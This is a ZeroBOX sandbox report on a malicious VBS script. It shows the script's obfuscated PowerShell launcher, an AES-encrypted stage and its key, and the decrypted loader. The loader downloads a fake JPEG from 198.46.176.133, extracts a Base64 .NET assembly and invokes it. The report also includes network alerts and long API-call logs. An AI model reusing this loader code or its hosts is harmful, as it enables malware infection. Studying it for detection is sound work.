popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

seemsitsgreattoreleasethedargonpily.gIF.vbs

Generic Malware Antivirus PowerShell
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6402 July 30, 2024, 10:02 a.m. July 30, 2024, 10:04 a.m.
Size 403.3KB
Type Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
MD5 1e06a0b540d76abb6e2712fa7e37138a
SHA256 7d9be9418bca7c307c7fed9ab4ad56058363ee8ad59ae401cfdbcbea7ff252e9
CRC32 C7902883
ssdeep 3072:sHGjwfhYFXhNe4VTdRnTT8w4TWvlqlQg7zpPXlXPS7f2lUDF5qbM9ypmPwZ:FwfhYFplqz
Yara None matched

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\seemsitsgreattoreleasethedargonpily.gIF.vbs

    3012

    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI78788979119683530985530790090406CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIxnPEzukRsRmzojEc2IqrsP6SzVylf4Lg1SsmmstVoJpV85MKYUwolNJkrLCOU5mJEMqMV+12DiEJ79pZ9yIaWkX01VWnCHXhB3HYMrMthz9dx3qVZG5quEhCgfQ6Zph6Ax6Lf4RH+PZR7dkdCwyLFaWfarqe/MQK49YgyXHqf8xybMvrfjAGQmSb8+3rz+o3mw40bVJxQ6m8tQdAkw6sCVRflXiNsvVPXd9z2Xi0ad/BdcF037OL0GwjtXRs4HTNhF7nzo4Ed5q/h3dLLIMSn2J+w2IWk+U5mgaGh75IlTQeR4SwCUwM45ySFmY56HoQ3vHGf2N49OpVzffLKifgubFQg5jD8FvJXO8aoVjOSTJCW69aOoGZTyK5J0HIGG5gJvjVmBk6igl+L+8yDRg781ddUNbUdYL922Qeo/CBrATzZ7nIcK64Yvri5jOiE57sC7hW5qPZlABLBL4Es2RDH83nRO7hflBwRplmsQrhQE08BcAtC5/H/dUM/kvdtXeeOX8Tuu7lESLHAr56TF9GhVOHA8prMr/tS2ZR0hyZfm7Bu3Tmdu+x2fwwzem8z+mBAmD/XKsxM6sTzoC3n1Ae0JVe73Zercxs+BmJJpbgXjZ+Q9u57NNqoS6U2CdC72jMJxHKDE4+VSNlWGl5O7OlHVD7o3Qsvf69qB0gqacfvTobcTSWza0EJF9kQ+5z3ZIN4RDUiT7O+w3Uqio7O7mnXWYIN/7LtXn62LFIRF3KVPy/5e+G9c8TEWAjIuK16XOWGMdYryMqIXHJ3DJ7W8AUmlfwhUaV8fAeSoTOsK9/b9nBvoFbAx5+hsd0hyHmpInkBC2DS/badEfD6PQJYrYcjkbGi0RoNniC2jHpPPdWIvIlnj2s8yLFbY35KLplcF4i3yVyXJ5kbYsqU3WF61Q38O8XXyiS2NXcTWzwb8zvTWXKUc8sjaWjj35wSYokblJCUj2oyo2B867XR0zuJ5ksaLRPpHeo9i8gtJ0FS5wmJ0XoFxiBz5+4fqoH7wQvJCQRXOb6f27I25twnb2ObtgolO3WOhl0izHAioF+1H3wM0sVxYtpu5z57tcag6+v30kNNbaBzxG+tzD5ToOrfi6Tce9xTGxoPOyFIIJJOJZGzdk4+HSKzeN9fZHZQXV8aKZDPujY3w9+PjqbvvKoSuY4psjbQuBgyGcFtkTHImmPuptN8Olz+SkUIa6Kcui5IEhw705+l8XTPBh3pewFIhVmN03zvUALvhifDR5gzFw3dgrcWS3k5q6w+21FcfYm4h9Rwx8pqfh5aEbMHkAsAhUbfwnDKj0Bzvd7b6h/aeqdx4BtT4PyDGMyDSZHQqQUtx5o2A/sy7aoFXDUGZw3QV3NebZhx2Lzm6xnxF43aMw22YC8GLh2Dks7+J5AnS+B3cZu3E5Mr1FIaQ/ekLxwOA/T8A==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')

      944

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
164.124.101.2 Active Moloch
198.46.176.133 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 198.46.176.133:80 -> 192.168.56.102:49163 2047750 ET MALWARE Base64 Encoded MZ In Image A Network Trojan was detected
TCP 198.46.176.133:80 -> 192.168.56.102:49163 2049038 ET MALWARE Malicious Base64 Encoded Payload In Image A Network Trojan was detected

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: Method invocation failed because [System.Security.Cryptography.AesManaged] does
console_handle: 0x00000023
1 1 0

WriteConsoleW

 buffer: n't contain a method named 'Dispose'.
console_handle: 0x0000002f
1 1 0

WriteConsoleW

 buffer: At line:1 char:715
console_handle: 0x0000003b
1 1 0

WriteConsoleW

 buffer: + function Decrypt-AESEncryption {Param([String]$Base64Text,[String]$Key)$aesMa
console_handle: 0x00000047
1 1 0

WriteConsoleW

 buffer: naged = New-Object System.Security.Cryptography.AesManaged;$aesManaged.Mode = [
console_handle: 0x00000053
1 1 0

WriteConsoleW

 buffer: System.Security.Cryptography.CipherMode]::CBC;$aesManaged.Padding = [System.Sec
console_handle: 0x0000005f
1 1 0

WriteConsoleW

 buffer: urity.Cryptography.PaddingMode]::Zeros;$aesManaged.BlockSize = 128;$aesManaged.
console_handle: 0x0000006b
1 1 0

WriteConsoleW

 buffer: KeySize = 256;$aesManaged.Key = (New-Object System.Security.Cryptography.SHA256
console_handle: 0x00000077
1 1 0

WriteConsoleW

 buffer: Managed).ComputeHash([System.Text.Encoding]::UTF8.GetBytes($Key));$cipherBytes
console_handle: 0x00000083
1 1 0

WriteConsoleW

 buffer: = [System.Convert]::FromBase64String($Base64Text);$aesManaged.IV = $cipherBytes
console_handle: 0x0000008f
1 1 0

WriteConsoleW

 buffer: [0..15];$decryptor = $aesManaged.CreateDecryptor();$decryptedBytes = $decryptor
console_handle: 0x0000009b
1 1 0

WriteConsoleW

 buffer: .TransformFinalBlock($cipherBytes, 16, $cipherBytes.Length - 16);$aesManaged.Di
console_handle: 0x000000a7
1 1 0

WriteConsoleW

 buffer: spose <<<< ();return [System.Text.Encoding]::UTF8.GetString($decryptedBytes).Tr
console_handle: 0x000000b3
1 1 0

WriteConsoleW

 buffer: im([char]0);}$chave = "78788979119683530985530790090406";$textoCriptografadoBas
console_handle: 0x000000bf
1 1 0

WriteConsoleW

 buffer: e64 = "xnPEzukRsRmzojEc2IqrsP6SzVylf4Lg1SsmmstVoJpV85MKYUwolNJkrLCOU5mJEMqMV+12
console_handle: 0x000000cb
1 1 0

WriteConsoleW

 buffer: DiEJ79pZ9yIaWkX01VWnCHXhB3HYMrMthz9dx3qVZG5quEhCgfQ6Zph6Ax6Lf4RH+PZR7dkdCwyLFaW
console_handle: 0x000000d7
1 1 0

WriteConsoleW

 buffer: farqe/MQK49YgyXHqf8xybMvrfjAGQmSb8+3rz+o3mw40bVJxQ6m8tQdAkw6sCVRflXiNsvVPXd9z2X
console_handle: 0x000000e3
1 1 0

WriteConsoleW

 buffer: i0ad/BdcF037OL0GwjtXRs4HTNhF7nzo4Ed5q/h3dLLIMSn2J+w2IWk+U5mgaGh75IlTQeR4SwCUwM4
console_handle: 0x000000ef
1 1 0

WriteConsoleW

 buffer: 5ySFmY56HoQ3vHGf2N49OpVzffLKifgubFQg5jD8FvJXO8aoVjOSTJCW69aOoGZTyK5J0HIGG5gJvjV
console_handle: 0x000000fb
1 1 0

WriteConsoleW

 buffer: mBk6igl+L+8yDRg781ddUNbUdYL922Qeo/CBrATzZ7nIcK64Yvri5jOiE57sC7hW5qPZlABLBL4Es2R
console_handle: 0x00000107
1 1 0

WriteConsoleW

 buffer: DH83nRO7hflBwRplmsQrhQE08BcAtC5/H/dUM/kvdtXeeOX8Tuu7lESLHAr56TF9GhVOHA8prMr/tS2
console_handle: 0x00000113
1 1 0

WriteConsoleW

 buffer: ZR0hyZfm7Bu3Tmdu+x2fwwzem8z+mBAmD/XKsxM6sTzoC3n1Ae0JVe73Zercxs+BmJJpbgXjZ+Q9u57
console_handle: 0x0000011f
1 1 0

WriteConsoleW

 buffer: NNqoS6U2CdC72jMJxHKDE4+VSNlWGl5O7OlHVD7o3Qsvf69qB0gqacfvTobcTSWza0EJF9kQ+5z3ZIN
console_handle: 0x0000012b
1 1 0

WriteConsoleW

 buffer: 4RDUiT7O+w3Uqio7O7mnXWYIN/7LtXn62LFIRF3KVPy/5e+G9c8TEWAjIuK16XOWGMdYryMqIXHJ3DJ
console_handle: 0x00000137
1 1 0

WriteConsoleW

 buffer: 7W8AUmlfwhUaV8fAeSoTOsK9/b9nBvoFbAx5+hsd0hyHmpInkBC2DS/badEfD6PQJYrYcjkbGi0RoNn
console_handle: 0x00000143
1 1 0

WriteConsoleW

 buffer: iC2jHpPPdWIvIlnj2s8yLFbY35KLplcF4i3yVyXJ5kbYsqU3WF61Q38O8XXyiS2NXcTWzwb8zvTWXKU
console_handle: 0x0000014f
1 1 0

WriteConsoleW

 buffer: c8sjaWjj35wSYokblJCUj2oyo2B867XR0zuJ5ksaLRPpHeo9i8gtJ0FS5wmJ0XoFxiBz5+4fqoH7wQv
console_handle: 0x0000015b
1 1 0

WriteConsoleW

 buffer: JCQRXOb6f27I25twnb2ObtgolO3WOhl0izHAioF+1H3wM0sVxYtpu5z57tcag6+v30kNNbaBzxG+tzD
console_handle: 0x00000167
1 1 0

WriteConsoleW

 buffer: 5ToOrfi6Tce9xTGxoPOyFIIJJOJZGzdk4+HSKzeN9fZHZQXV8aKZDPujY3w9+PjqbvvKoSuY4psjbQu
console_handle: 0x00000173
1 1 0

WriteConsoleW

 buffer: BgyGcFtkTHImmPuptN8Olz+SkUIa6Kcui5IEhw705+l8XTPBh3pewFIhVmN03zvUALvhifDR5gzFw3d
console_handle: 0x0000017f
1 1 0

WriteConsoleW

 buffer: grcWS3k5q6w+21FcfYm4h9Rwx8pqfh5aEbMHkAsAhUbfwnDKj0Bzvd7b6h/aeqdx4BtT4PyDGMyDSZH
console_handle: 0x0000018b
1 1 0

WriteConsoleW

 buffer: QqQUtx5o2A/sy7aoFXDUGZw3QV3NebZhx2Lzm6xnxF43aMw22YC8GLh2Dks7+J5AnS+B3cZu3E5Mr1F
console_handle: 0x00000197
1 1 0

WriteConsoleW

 buffer: IaQ/ekLxwOA/T8A==";$textoDescriptografado = Decrypt-AESEncryption -Base64Text $
console_handle: 0x000001a3
1 1 0

WriteConsoleW

 buffer: textoCriptografadoBase64 -Key $chave;Write-Host "Texto Descriptografado: $texto
console_handle: 0x000001af
1 1 0

WriteConsoleW

 buffer: Descriptografado";Invoke-Expression $textoDescriptografado;
console_handle: 0x000001bb
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : InvalidOperation: (Dispose:String) [], RuntimeEx
console_handle: 0x000001c7
1 1 0

WriteConsoleW

 buffer: ception
console_handle: 0x000001d3
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : MethodNotFound
console_handle: 0x000001df
1 1 0

WriteConsoleW

 buffer: Texto Descriptografado: $link = 'http://198.46.176.133/Upload/vbs.jpeg'; $webClient = New-Object System.Net.WebClient; try { $downloadedData = $webClient.DownloadData($link) } catch { Write-Host 'Failed To download data from $link' -ForegroundColor Red; exit }; if ($downloadedData -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($downloadedData); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('dnlib.IO.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.FVEW/054/371.441.842.901//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm','desativado')) } }
console_handle: 0x000001fb
1 1 0

WriteConsoleW

 buffer: Exception calling "Invoke" with "2" argument(s): "The requested security protoc
console_handle: 0x00000023
1 1 0

WriteConsoleW

 buffer: ol is not supported."
console_handle: 0x0000002f
1 1 0

WriteConsoleW

 buffer: At line:1 char:916
console_handle: 0x0000003b
1 1 0

WriteConsoleW

 buffer: + $link = 'http://198.46.176.133/Upload/vbs.jpeg'; $webClient = New-Object Syst
console_handle: 0x00000047
1 1 0

WriteConsoleW

 buffer: em.Net.WebClient; try { $downloadedData = $webClient.DownloadData($link) } catc
console_handle: 0x00000053
1 1 0

WriteConsoleW

 buffer: h { Write-Host 'Failed To download data from $link' -ForegroundColor Red; exit
console_handle: 0x0000005f
1 1 0

WriteConsoleW

 buffer: }; if ($downloadedData -ne $null) { $imageText = [System.Text.Encoding]::UTF8.G
console_handle: 0x0000006b
1 1 0

WriteConsoleW

 buffer: etString($downloadedData); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE6
console_handle: 0x00000077
1 1 0

WriteConsoleW

 buffer: 4_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.
console_handle: 0x00000083
1 1 0

WriteConsoleW

 buffer: IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $sta
console_handle: 0x0000008f
1 1 0

WriteConsoleW

 buffer: rtIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64C
console_handle: 0x0000009b
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00673ee0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00673c20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00673c20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00673c20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00673820
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00673820
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00673820
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00673820
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00673820
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00673820
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00673320
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00673320
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00673320
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00673e20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00673e20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00673e20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006739e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00673e20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00673e20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00673e20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00673e20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00673e20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00673e20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00673e20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00673ce0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00673ce0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00673ce0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00673ce0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00673ce0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00673ce0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00673ce0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00673ce0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00673ce0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00673ce0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00673ce0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00673ce0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00673ce0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00673ce0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006733e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006733e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00673b20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00673b20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00673b20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00673b20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00673620
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00673620
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006735e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006735e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://198.46.176.133/Upload/vbs.jpeg
request GET http://198.46.176.133/Upload/vbs.jpeg
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 944
region_size: 1376256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029f0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 944
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b00000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 944
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73971000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 944
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0202a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 944
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73972000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 944
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02022000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 944
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02032000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 944
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b01000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 944
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b02000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 944
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0205a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 944
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02033000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 944
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02034000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 944
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0206b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 944
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02067000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 944
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0202b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 944
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02052000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 944
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02065000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 944
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02035000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 944
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0205c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 944
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029a0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 944
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02036000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 944
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0206c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 944
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
